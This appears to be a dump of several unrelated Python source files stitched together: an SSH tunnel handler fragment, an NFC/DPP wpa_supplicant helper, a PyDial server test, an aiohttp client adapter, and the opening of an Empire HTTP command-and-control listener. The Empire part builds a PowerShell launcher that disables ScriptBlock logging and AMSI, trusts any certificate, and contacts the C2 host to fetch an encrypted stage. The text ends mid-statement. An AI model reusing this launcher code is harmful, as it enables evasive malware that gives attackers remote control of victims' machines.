% (self.chain_host, self.chain_port, repr(e))
)
return
if chan is None:
logging.error(
"Incoming request to %s:%d was rejected by the SSH server."
% (self.chain_host, self.chain_port)
)
return
logging.info(
"Connected! Tunnel open %r -> %r -> %r"
% (
self.request.getpeername(),
chan.getpeername(),
(self.chain_host, self.chain_port),
)
)
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
peername = self.request.getpeername()
chan.close()
self.request.close()
logging.info("Tunnel closed from %r" % (peername,))
def _forward_tunnel(self):
# this is a little convoluted, but lets me configure things for the Handler
# object. (SocketServer doesn't give Handlers any way to access the outer
# server normally.)
class SubHander(SshTransport.SshHandler):
chain_host = "localhost"
chain_port = self._remote_port
ssh_transport = self._ssh_transport
self._connection = SshTransport.SshForwardServer(("localhost", 0), SubHander)
# Get the local port
self._port = self._connection.server_address[1]
# Start a thread to run the server
def server_thread():
self._connection.serve_forever()
Thread(target=server_thread, daemon=True).start()
|
dpp-nfc.py | #!/usr/bin/python3
#
# Example nfcpy to wpa_supplicant wrapper for DPP NFC operations
# Copyright (c) 2012-2013, Jouni Malinen <j@w1.fi>
# Copyright (c) 2019-2020, The Linux Foundation
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import os
import sys
import time
import threading
import argparse
import nfc
import ndef
import logging
scriptsdir = os.path.dirname(os.path.realpath("dpp-nfc.py"))
sys.path.append(os.path.join(scriptsdir, '..', '..', 'wpaspy'))
import wpaspy
wpas_ctrl = '/var/run/wpa_supplicant'
ifname = None
init_on_touch = False
in_raw_mode = False
prev_tcgetattr = 0
no_input = False
srv = None
continue_loop = True
terminate_now = False
summary_file = None
success_file = None
def summary(txt):
print(txt)
if summary_file:
with open(summary_file, 'a') as f:
f.write(txt + "\n")
def success_report(txt):
summary(txt)
if success_file:
with open(success_file, 'a') as f:
f.write(txt + "\n")
def wpas_connect():
ifaces = []
if os.path.isdir(wpas_ctrl):
try:
ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)]
except OSError as error:
print("Could not find wpa_supplicant: ", error)
return None
if len(ifaces) < 1:
print("No wpa_supplicant control interface found")
return None
for ctrl in ifaces:
if ifname:
if ifname not in ctrl:
continue
try:
print("Trying to use control interface " + ctrl)
wpas = wpaspy.Ctrl(ctrl)
return wpas
except Exception as e:
pass
return None
def dpp_nfc_uri_process(uri):
wpas = wpas_connect()
if wpas is None:
return False
peer_id = wpas.request("DPP_NFC_URI " + uri)
if "FAIL" in peer_id:
print("Could not parse DPP URI from NFC URI record")
return False
peer_id = int(peer_id)
print("peer_id=%d" % peer_id)
cmd = "DPP_AUTH_INIT peer=%d" % peer_id
res = wpas.request(cmd)
if "OK" not in res:
print("Failed to initiate DPP Authentication")
return False
print("DPP Authentication initiated")
return True
def dpp_hs_tag_read(record):
wpas = wpas_connect()
if wpas is None:
return False
print(record)
if len(record.data) < 5:
print("Too short DPP HS")
return False
if record.data[0] != 0:
print("Unexpected URI Identifier Code")
return False
uribuf = record.data[1:]
try:
uri = uribuf.decode()
except:
print("Invalid URI payload")
return False
print("URI: " + uri)
if not uri.startswith("DPP:"):
print("Not a DPP URI")
return False
return dpp_nfc_uri_process(uri)
def get_status(wpas, extra=None):
if extra:
extra = "-" + extra
else:
extra = ""
res = wpas.request("STATUS" + extra)
lines = res.splitlines()
vals = dict()
for l in lines:
try:
[name, value] = l.split('=', 1)
except ValueError:
logger.info("Ignore unexpected status line: " + l)
continue
vals[name] = value
return vals
def get_status_field(wpas, field, extra=None):
vals = get_status(wpas, extra)
if field in vals:
return vals[field]
return None
def own_addr(wpas):
return get_status_field(wpas, "address")
def dpp_bootstrap_gen(wpas, type="qrcode", chan=None, mac=None, info=None,
curve=None, key=None):
cmd = "DPP_BOOTSTRAP_GEN type=" + type
if chan:
cmd += " chan=" + chan
if mac:
if mac is True:
mac = own_addr(wpas)
cmd += " mac=" + mac.replace(':', '')
if info:
cmd += " info=" + info
if curve:
cmd += " curve=" + curve
if key:
cmd += " key=" + key
res = wpas.request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
return int(res)
def wpas_get_nfc_uri(start_listen=True):
wpas = wpas_connect()
if wpas is None:
return None
global own_id, chanlist
own_id = dpp_bootstrap_gen(wpas, type="nfc-uri", chan=chanlist, mac=True)
res = wpas.request("DPP_BOOTSTRAP_GET_URI %d" % own_id).rstrip()
if "FAIL" in res:
return None
if start_listen:
wpas.request("DPP_LISTEN 2412 netrole=configurator")
return res
def wpas_report_handover_req(uri):
wpas = wpas_connect()
if wpas is None:
return None
global own_id
cmd = "DPP_NFC_HANDOVER_REQ own=%d uri=%s" % (own_id, uri)
return wpas.request(cmd)
def wpas_report_handover_sel(uri):
wpas = wpas_connect()
if wpas is None:
return None
global own_id
cmd = "DPP_NFC_HANDOVER_SEL own=%d uri=%s" % (own_id, uri)
return wpas.request(cmd)
def dpp_handover_client(llc):
uri = wpas_get_nfc_uri(start_listen=False)
uri = ndef.UriRecord(uri)
print("NFC URI record for DPP: " + str(uri))
carrier = ndef.Record('application/vnd.wfa.dpp', 'A', uri.data)
hr = ndef.HandoverRequestRecord(version="1.4", crn=os.urandom(2))
hr.add_alternative_carrier('active', carrier.name)
message = [hr, carrier]
print("NFC Handover Request message for DPP: " + str(message))
client = nfc.handover.HandoverClient(llc)
try:
summary("Trying to initiate NFC connection handover")
client.connect()
summary("Connected for handover")
except nfc.llcp.ConnectRefused:
summary("Handover connection refused")
client.close()
return
except Exception as e:
summary("Other exception: " + str(e))
client.close()
return
summary("Sending handover request")
if not client.send_records(message):
summary("Failed to send handover request")
client.close()
return
summary("Receiving handover response")
message = client.recv_records(timeout=3.0)
if message is None:
summary("No response received")
client.close()
return
print("Received message: " + str(message))
if len(message) < 1 or \
not isinstance(message[0], ndef.HandoverSelectRecord):
summary("Response was not Hs - received: " + message.type)
client.close()
return
print("Received message")
print("alternative carriers: " + str(message[0].alternative_carriers))
dpp_found = False
for carrier in message:
if isinstance(carrier, ndef.HandoverSelectRecord):
continue
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.dpp":
if len(carrier.data) == 0 or carrier.data[0] != 0:
print("URI Identifier Code 'None' not seen")
continue
print("DPP carrier type match - send to wpa_supplicant")
dpp_found = True
uri = carrier.data[1:].decode("utf-8")
print("DPP URI: " + uri)
res = wpas_report_handover_sel(uri)
if res is None or "FAIL" in res:
summary("DPP handover report rejected")
break
success_report("DPP handover reported successfully (initiator)")
print("peer_id=" + res)
peer_id = int(res)
# TODO: Single Configurator instance
wpas = wpas_connect()
if wpas is None:
break
res = wpas.request("DPP_CONFIGURATOR_ADD")
if "FAIL" in res:
print("Failed to initiate Configurator")
break
conf_id = int(res)
global own_id
print("Initiate DPP authentication")
cmd = "DPP_AUTH_INIT peer=%d own=%d conf=sta-dpp configurator=%d" % (peer_id, own_id, conf_id)
res = wpas.request(cmd)
if "FAIL" in res:
print("Failed to initiate DPP authentication")
break
if not dpp_found:
print("DPP carrier not seen in response - allow peer to initiate a new handover with different parameters")
client.close()
print("Returning from dpp_handover_client")
return
print("Remove peer")
client.close()
print("Done with handover")
global only_one
if only_one:
print("only_one -> stop loop")
global continue_loop
continue_loop = False
global no_wait
if no_wait:
print("Trying to exit..")
global terminate_now
terminate_now = True
print("Returning from dpp_handover_client")
class HandoverServer(nfc.handover.HandoverServer):
def __init__(self, llc):
super(HandoverServer, self).__init__(llc)
self.sent_carrier = None
self.ho_server_processing = False
self.success = False
self.try_own = False
def process_handover_request_message(self, records):
self.ho_server_processing = True
clear_raw_mode()
print("\nHandoverServer - request received: " + str(records))
carrier = None
hs = ndef.HandoverSelectRecord('1.4')
sel = [hs]
found = False
for carrier in records:
if isinstance(carrier, ndef.HandoverRequestRecord):
continue
print("Remote carrier type: " + carrier.type)
if carrier.type == "application/vnd.wfa.dpp":
print("DPP carrier type match - add DPP carrier record")
if len(carrier.data) == 0 or carrier.data[0] != 0:
print("URI Identifier Code 'None' not seen")
continue
uri = carrier.data[1:].decode("utf-8")
print("Received DPP URI: " + uri)
data = wpas_get_nfc_uri(start_listen=False)
print("Own URI (pre-processing): %s" % data)
res = wpas_report_handover_req(uri)
if res is None or "FAIL" in res:
print("DPP handover request processing failed")
continue
found = True
self.received_carrier = carrier
wpas = wpas_connect()
if wpas is None:
continue
global own_id
data = wpas.request("DPP_BOOTSTRAP_GET_URI %d" % own_id).rstrip()
if "FAIL" in data:
continue
print("Own URI (post-processing): %s" % data)
uri = ndef.UriRecord(data)
print("Own bootstrapping NFC URI record: " + str(uri))
info = wpas.request("DPP_BOOTSTRAP_INFO %d" % own_id)
freq = None
for line in info.splitlines():
if line.startswith("use_freq="):
freq = int(line.split('=')[1])
if freq is None:
print("No channel negotiated over NFC - use channel 1")
freq = 2412
res = wpas.request("DPP_LISTEN %d" % freq)
if "OK" not in res:
print("Failed to start DPP listen")
break
carrier = ndef.Record('application/vnd.wfa.dpp', 'A', uri.data)
print("Own DPP carrier record: " + str(carrier))
hs.add_alternative_carrier('active', carrier.name)
sel = [hs, carrier]
break
summary("Sending handover select: " + str(sel))
if found:
self.success = True
else:
self.try_own = True
return sel
def clear_raw_mode():
import sys, tty, termios
global prev_tcgetattr, in_raw_mode
if not in_raw_mode:
return
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
def getch():
import sys, tty, termios, select
global prev_tcgetattr, in_raw_mode
fd = sys.stdin.fileno()
prev_tcgetattr = termios.tcgetattr(fd)
ch = None
try:
tty.setraw(fd)
in_raw_mode = True
[i, o, e] = select.select([fd], [], [], 0.05)
if i:
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
return ch
def dpp_tag_read(tag):
success = False
for record in tag.ndef.records:
print(record)
print("record type " + record.type)
if record.type == "application/vnd.wfa.dpp":
summary("DPP HS tag - send to wpa_supplicant")
success = dpp_hs_tag_read(record)
break
if isinstance(record, ndef.UriRecord):
print("URI record: uri=" + record.uri)
print("URI record: iri=" + record.iri)
if record.iri.startswith("DPP:"):
print("DPP URI")
if not dpp_nfc_uri_process(record.iri):
break
success = True
else:
print("Ignore unknown URI")
break
if success:
success_report("Tag read succeeded")
return success
def rdwr_connected_write_tag(tag):
summary("Tag found - writing - " + str(tag))
if not tag.ndef.is_writeable:
print("Not a writable tag")
return
global dpp_tag_data
if tag.ndef.capacity < len(dpp_tag_data):
print("Not enough room for the message")
return
tag.ndef.records = dpp_tag_data
success_report("Tag write succeeded")
print("Done - remove tag")
global only_one
if only_one:
global continue_loop
continue_loop = False
global dpp_sel_wait_remove
return dpp_sel_wait_remove
def write_nfc_uri(clf, wait_remove=True):
print("Write NFC URI record")
data = wpas_get_nfc_uri()
if data is None:
summary("Could not get NFC URI from wpa_supplicant")
return
global dpp_sel_wait_remove
dpp_sel_wait_remove = wait_remove
print("URI: %s" % data)
uri = ndef.UriRecord(data)
print(uri)
print("Touch an NFC tag")
global dpp_tag_data
dpp_tag_data = [uri]
clf.connect(rdwr={'on-connect': rdwr_connected_write_tag})
def write_nfc_hs(clf, wait_remove=True):
print("Write NFC Handover Select record on a tag")
data = wpas_get_nfc_uri()
if data is None:
summary("Could not get NFC URI from wpa_supplicant")
return
global dpp_sel_wait_remove
dpp_sel_wait_remove = wait_remove
print("URI: %s" % data)
uri = ndef.UriRecord(data)
print(uri)
carrier = ndef.Record('application/vnd.wfa.dpp', 'A', uri.data)
hs = ndef.HandoverSelectRecord('1.4')
hs.add_alternative_carrier('active', carrier.name)
print(hs)
print(carrier)
print("Touch an NFC tag")
global dpp_tag_data
dpp_tag_data = [hs, carrier]
print(dpp_tag_data)
clf.connect(rdwr={'on-connect': rdwr_connected_write_tag})
def rdwr_connected(tag):
global only_one, no_wait
summary("Tag connected: " + str(tag))
if tag.ndef:
print("NDEF tag: " + tag.type)
print(tag.ndef.records)
success = dpp_tag_read(tag)
if only_one and success:
global continue_loop
continue_loop = False
else:
summary("Not an NDEF tag - remove tag")
return True
return not no_wait
def llcp_worker(llc):
global init_on_touch
if init_on_touch:
print("Starting handover client")
dpp_handover_client(llc)
print("Exiting llcp_worker thread (init_in_touch)")
return
global no_input
if no_input:
print("Wait for handover to complete")
else:
print("Wait for handover to complete - press 'i' to initiate")
global srv
global wait_connection
while not wait_connection and srv.sent_carrier is None:
if srv.try_own:
srv.try_own = False
print("Try to initiate another handover with own parameters")
dpp_handover_client(llc)
print("Exiting llcp_worker thread (retry with own parameters)")
return
if srv.ho_server_processing:
time.sleep(0.025)
elif no_input:
time.sleep(0.5)
else:
res = getch()
if res != 'i':
continue
clear_raw_mode()
print("Starting handover client")
dpp_handover_client(llc)
print("Exiting llcp_worker thread (manual init)")
return
clear_raw_mode()
print("\rExiting llcp_worker thread")
def llcp_startup(llc):
print("Start LLCP server")
global srv
srv = HandoverServer(llc)
return llc
def llcp_connected(llc):
print("P2P LLCP connected")
global wait_connection
wait_connection = False
global init_on_touch
if not init_on_touch:
global srv
srv.start()
if init_on_touch or not no_input:
threading.Thread(target=llcp_worker, args=(llc,)).start()
return True
def llcp_release(llc):
print("LLCP release")
return True
def terminate_loop():
global terminate_now
return terminate_now
def main():
clf = nfc.ContactlessFrontend()
parser = argparse.ArgumentParser(description='nfcpy to wpa_supplicant integration for DPP NFC operations')
parser.add_argument('-d', const=logging.DEBUG, default=logging.INFO,
action='store_const', dest='loglevel',
help='verbose debug output')
parser.add_argument('-q', const=logging.WARNING, action='store_const',
dest='loglevel', help='be quiet')
parser.add_argument('--only-one', '-1', action='store_true',
help='run only one operation and exit')
parser.add_argument('--init-on-touch', '-I', action='store_true',
help='initiate handover on touch')
parser.add_argument('--no-wait', action='store_true',
help='do not wait for tag to be removed before exiting')
parser.add_argument('--ifname', '-i',
help='network interface name')
parser.add_argument('--no-input', '-a', action='store_true',
help='do not use stdout input to initiate handover')
parser.add_argument('--tag-read-only', '-t', action='store_true',
help='tag read only (do not allow connection handover)')
parser.add_argument('--handover-only', action='store_true',
help='connection handover only (do not allow tag read)')
parser.add_argument('--summary',
help='summary file for writing status updates')
parser.add_argument('--success',
help='success file for writing success update')
parser.add_argument('--device', default='usb', help='NFC device to open')
parser.add_argument('--chan', default='81/1', help='channel list')
parser.add_argument('command', choices=['write-nfc-uri',
'write-nfc-hs'],
nargs='?')
args = parser.parse_args()
print(args)
global only_one
only_one = args.only_one
global no_wait
no_wait = args.no_wait
global chanlist
chanlist = args.chan
logging.basicConfig(level=args.loglevel)
global init_on_touch
init_on_touch = args.init_on_touch
if args.ifname:
global ifname
ifname = args.ifname
print("Selected ifname " + ifname)
if args.summary:
global summary_file
summary_file = args.summary
if args.success:
global success_file
success_file = args.success
if args.no_input:
global no_input
no_input = True
clf = nfc.ContactlessFrontend()
global wait_connection
try:
if not clf.open(args.device):
print("Could not open connection with an NFC device")
raise SystemExit
if args.command == "write-nfc-uri":
write_nfc_uri(clf, wait_remove=not args.no_wait)
raise SystemExit
if args.command == "write-nfc-hs":
write_nfc_hs(clf, wait_remove=not args.no_wait)
raise SystemExit
global continue_loop
while continue_loop:
clear_raw_mode()
print("\rWaiting for a tag or peer to be touched")
wait_connection = True
try:
if args.tag_read_only:
if not clf.connect(rdwr={'on-connect': rdwr_connected}):
break
elif args.handover_only:
if not clf.connect(llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected,
'on-release': llcp_release},
terminate=terminate_loop):
break
else:
if not clf.connect(rdwr={'on-connect': rdwr_connected},
llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected,
'on-release': llcp_release},
terminate=terminate_loop):
break
except Exception as e:
print("clf.connect failed: " + str(e))
break
global srv
if only_one and srv and srv.success:
raise SystemExit
except KeyboardInterrupt:
raise SystemExit
finally:
clf.close()
raise SystemExit
if __name__ == '__main__':
main()
|
test_DialogueServer.py | ###############################################################################
# PyDial: Multi-domain Statistical Spoken Dialogue System Software
###############################################################################
#
# Copyright 2015 - 2017
# Cambridge University Engineering Department Dialogue Systems Group
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
'''
************************
**test_DialogueServer.py** - test DialogueServer()
================================================================================
Use *utils/dummyDialogueServerClient* to create multiprocess instances of a fake
client which communicate concurrently with a running dialogue server in a separate process.
'''
import os,sys
curdir = os.path.dirname(os.path.realpath(__file__))
curdir = curdir.split('/')
curdir = '/'.join(curdir[:-1]) +'/'
os.chdir(curdir)
sys.path.append(curdir)
#from nose.tools import with_setup
from ontology import Ontology
from utils import Settings, dummyDialogueServerClient, ContextLogger
import multiprocessing as mp
import DialogueServer
import time
class TDialogueServer():
"""
"""
def __init__(self):
cfg = 'tests/test_configs/dialogueserver.cfg'
assert(os.path.exists(cfg))
Settings.init(config_file=cfg)
ContextLogger.createLoggingHandlers(config=Settings.config)
def ds(self):
reload(Ontology.FlatOntologyManager)
Ontology.init_global_ontology()
dial_server = DialogueServer.DialogueServer()
dial_server.run()
def test_dialogueserver(self):
'''Create a DialogueServer and a few dummy clients
'''
p = mp.Process(target=self.ds)
p.start()
dummyDialogueServerClient.run_fake_clients(NUM_CLIENTS=3,pause_time=0,DIALOGS_PER_CLIENT=1)
p.terminate()
def Test():
test = TDialogueServer()
print "\nExecuting tests in",test.__class__.__name__
test.test_dialogueserver()
print "Done"
if __name__ == '__main__':
Test()
#END OF FILE
|
aiohttp_.py | """
This module defines an :py:class:`aiohttp.ClientSession` adapter
that returns awaitable responses.
"""
# Standard library imports
import atexit
import asyncio
import collections
import threading
from concurrent import futures
from functools import partial
# Third party imports
try:
import aiohttp
except ImportError: # pragma: no cover
aiohttp = None
# Local imports
from uplink.clients import helpers, interfaces, register
def threaded_callback(callback):
coroutine_callback = asyncio.coroutine(callback)
@asyncio.coroutine
def new_callback(response):
yield from response.text()
response = ThreadedResponse(response)
response = yield from coroutine_callback(response)
if isinstance(response, ThreadedResponse):
return response.unwrap()
else:
return response
return new_callback
class AiohttpClient(interfaces.HttpClientAdapter):
"""
An :py:mod:`aiohttp` client that creates awaitable responses.
Note:
This client is an optional feature and requires the :py:mod:`aiohttp`
package. For example, here's how to install this extra using pip::
$ pip install uplink[aiohttp]
Args:
session (:py:class:`aiohttp.ClientSession`, optional):
The session that should handle sending requests. If this
argument is omitted or set to :py:obj:`None`, a new session
will be created.
"""
# TODO: Update docstrings to include aiohttp constructor parameters.
__ARG_SPEC = collections.namedtuple("__ARG_SPEC", "args kwargs")
def __init__(self, session=None, **kwargs):
if aiohttp is None:
raise NotImplementedError("aiohttp is not installed.")
if session is None:
session = self._create_session(**kwargs)
self._session = session
self._sync_callback_adapter = threaded_callback
def create_request(self):
return Request(self)
@asyncio.coroutine
def session(self):
"""Returns the underlying `aiohttp.ClientSession`."""
if isinstance(self._session, self.__ARG_SPEC):
args, kwargs = self._session
self._session = aiohttp.ClientSession(*args, **kwargs)
# aiohttp v3.0 has made ClientSession.close a coroutine,
# so we check whether it is one here and register it
# to run appropriately at exit
if asyncio.iscoroutinefunction(self._session.close):
atexit.register(
partial(
asyncio.get_event_loop().run_until_complete,
self._session.close(),
)
)
else:
atexit.register(self._session.close)
return self._session
def wrap_callback(self, callback):
if not asyncio.iscoroutinefunction(callback):
callback = self._sync_callback_adapter(callback)
return callback
@staticmethod
@register.handler
def with_session(session, *args, **kwargs):
"""
Builds a client instance if the first argument is a
:py:class:`aiohttp.ClientSession`. Otherwise, return :py:obj:`None`.
"""
if isinstance(session, aiohttp.ClientSession):
return AiohttpClient(session, *args, **kwargs)
@classmethod
def _create_session(cls, *args, **kwargs):
return cls.__ARG_SPEC(args, kwargs)
@classmethod
def create(cls, *args, **kwargs):
"""
Builds a client instance with
:py:class:`aiohttp.ClientSession` arguments.
Instead of directly initializing this class with a
:py:class:`aiohttp.ClientSession`, use this method to have the
client lazily construct a session when sending the first
request. Hence, this method guarantees that the creation of the
underlying session happens inside of a coroutine.
Args:
*args: positional arguments that
:py:class:`aiohttp.ClientSession` takes.
**kwargs: keyword arguments that
:py:class:`aiohttp.ClientSession` takes.
"""
session_build_args = cls._create_session(*args, **kwargs)
return AiohttpClient(session=session_build_args)
class Request(helpers.ExceptionHandlerMixin, interfaces.Request):
def __init__(self, client):
self._client = client
self._callback = None
@asyncio.coroutine
def send(self, method, url, extras):
session = yield from self._client.session()
with self._exception_handler:
response = yield from session.request(method, url, **extras)
if self._callback is not None:
response = yield from self._callback(response)
return response
def add_callback(self, callback):
self._callback = self._client.wrap_callback(callback)
class ThreadedCoroutine(object):
def __init__(self, coroutine):
self.__coroutine = coroutine
def __call__(self, *args, **kwargs):
with AsyncioExecutor() as executor:
future = executor.submit(self.__coroutine, *args, **kwargs)
result = future.result()
return result
class ThreadedResponse(object):
def __init__(self, response):
self.__response = response
def __getattr__(self, item):
value = getattr(self.__response, item)
if asyncio.iscoroutinefunction(value):
return ThreadedCoroutine(value)
return value
def unwrap(self):
return self.__response
class AsyncioExecutor(futures.Executor):
"""
Executor that runs asyncio coroutines in a shadow thread.
Credit to Vincent Michel, who wrote the original implementation:
https://gist.github.com/vxgmichel/d16e66d1107a369877f6ef7e646ac2e5
"""
def __init__(self):
self._loop = asyncio.new_event_loop()
self._thread = threading.Thread(target=self._target)
self._thread.start()
def _target(self):
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
def submit(self, fn, *args, **kwargs):
coro = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coro, self._loop)
def shutdown(self, wait=True):
self._loop.call_soon_threadsafe(self._loop.stop)
if wait: # pragma: no cover
self._thread.join()
|
http.py | import logging
import base64
import random
import os
import ssl
import time
import copy
from pydispatch import dispatcher
from flask import Flask, request, make_response
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
page = "<html><body><h1>It works!</h1>"
page += "<p>This is the default web page for this server.</p>"
page += "<p>The web server software is running but no content has been added, yet.</p>"
page += "</body></html>"
return page
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = ''
if safeChecks.lower() == 'true':
# ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
stager += helpers.randomize_capitalization("$GroupPolicySettings")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
